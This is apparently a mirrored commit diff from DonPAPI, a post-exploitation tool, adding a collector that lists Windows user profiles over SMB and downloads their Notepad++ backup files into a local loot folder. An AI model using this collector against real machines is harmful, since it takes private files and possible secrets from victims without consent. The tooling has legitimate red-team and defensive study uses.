RepoMirrors
/
DonPAPI
mirror of https://github.com/login-securite/DonPAPI
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #81 from Dfte/Add-Notepad++-collector 

Add notepad++ collector
This commit is contained in:
Login Securite 2024-10-19 13:21:39 +02:00 committed by GitHub
parent 4f69182529 31584d5bdb
commit 08282a06d2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 11 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
donpapi/collectors/powershellhistory.py → donpapi/collectors/notepadpp.py
View File

@ -7,11 +7,11 @@ from donpapi.core import DonPAPICore
from donpapi.lib.logger import DonPAPIAdapter
TAG = "PowerShellHistory"
TAG = "NotepadPP"
class PowerShellHistoryDump:
class NotepadPPDump:
false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"]
user_directories = ["\\Users\\{username}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\"]
user_directories = ["Users\\{username}\\AppData\\Roaming\\Notepad++\\backup\\"]
max_filesize = 5000000
def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None:
@ -25,12 +25,12 @@ class PowerShellHistoryDump:
def run(self):
self.logger.display("Gathering powershell history files")
self.logger.display("Gathering notepad++ backup files")
for user in self.context.users:
for directory in self.user_directories:
directory_path = directory.format(username=user)
self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)
self.logger.secret(f"Found {self.found} powershell history files", TAG)
self.logger.secret(f"Found {self.found} notepad++ backup files", TAG)
def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
@ -48,10 +48,10 @@ class PowerShellHistoryDump:
file_content = b""
f.write(file_content)
# Stores files in loot\PowerShellHistory
os.makedirs(f"{self.context.output_dir}/../PowerShellHistory", exist_ok=True)
# Stores files in loot\NotepadPP
os.makedirs(f"{self.context.output_dir}/../NotepadPP", exist_ok=True)
local_filepath = os.path.join(
f"{self.context.output_dir}/../PowerShellHistory",
f"{self.context.output_dir}/../NotepadPP",
f"{item.get_longname()}-{self.found}"
)
with open(local_filepath, "wb") as f:

4
donpapi/entry.py
View File

@ -40,6 +40,7 @@ from donpapi.collectors.recent_files import FilesDump, TAG as FilesTag
from donpapi.collectors.sccm import SCCMDump, TAG as SCCMTag
from donpapi.collectors.mremoteng import MRemoteNgDump, TAG as MRemoteNgTag
from donpapi.collectors.vnc import VNCDump, TAG as VNCTag
from donpapi.collectors.notepadpp import NotepadPPDump, TAG as NotepadPPTag
from donpapi.collectors.powershellhistory import PowerShellHistoryDump, TAG as PowerShellHistoryTag
from donpapi.lib.config import DonPAPIConfig, parse_config_file
from donpapi.lib.database import Database, create_db_engine
@ -63,7 +64,8 @@ COLLECTORS_LIST = {
VaultsTag: VaultsDump,
VNCTag: VNCDump,
WifiTag: WifiDump,
PowerShellHistoryTag: PowerShellHistoryDump
PowerShellHistoryTag: PowerShellHistoryDump,
NotepadPPTag: NotepadPPDump
}
def set_main_logger(logger , host = "\U0001F480"):